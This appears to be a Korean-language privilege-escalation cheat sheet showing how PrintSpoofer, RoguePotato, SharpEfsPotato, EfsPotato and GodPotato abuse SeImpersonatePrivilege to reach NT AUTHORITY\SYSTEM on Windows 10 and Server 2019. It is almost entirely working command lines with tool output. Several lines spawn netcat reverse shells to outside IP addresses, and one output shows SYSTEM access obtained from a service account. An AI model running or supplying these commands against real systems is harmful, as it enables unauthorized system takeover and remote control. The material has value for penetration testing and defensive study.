JuicyPotato는 Windows Server 2019 및 Windows 10 빌드 1809 이상에서 작동하지 않습니다. 그러나, PrintSpoofer,RoguePotato,SharpEfsPotato,GodPotato,EfsPotato,DCOMPotato**를 사용하여 동일한 권한을 활용하고 NT AUTHORITY\SYSTEM 수준의 접근을 얻을 수 있습니다. 이 블로그 게시물은 JuicyPotato가 더 이상 작동하지 않는 Windows 10 및 Server 2019 호스트에서 가장기능을 남용하는 데 사용할 수 있는 PrintSpoofer 도구에 대해 자세히 설명합니다.
Quick Demo
PrintSpoofer
c:\PrintSpoofer.exe-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"--------------------------------------------------------------------------------[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKNULL
RoguePotato
c:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-l9999# In some old versions you need to use the "-f" paramc:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-f9999
SharpEfsPotato
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"SharpEfsPotatoby@bugch3ckLocalprivilegeescalationfromSeImpersonatePrivilegeusingEfsRpc.BuiltfromSweetPotatoby@_EthicalChaos_andSharpSystemTriggers/SharpEfsTriggerby@cube0x0.[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!C:\temp>typeC:\temp\w.logntauthority\system
EfsPotato
> EfsPotato.exe "whoami"ExploitforEfsPotato(MS-EFSREfsRpcEncryptFileSrvwithSeImpersonatePrivilegelocalprivalegeescalationvulnerability).PartofGMH's fuck Tools, Code By zcgonvh.CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net][+] Current user: NT Service\MSSQLSERVER[+] Pipe: \pipe\lsarpc[!] binding ok (handle=aeee30)[+] Get Token: 888[!] process with pid: 3696 created.==============================[x] EfsRpcEncryptFileSrv failed: 1818nt authority\system
GodPotato
> GodPotato -cmd "cmd /c whoami"# You can achieve a reverse shell like this.> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"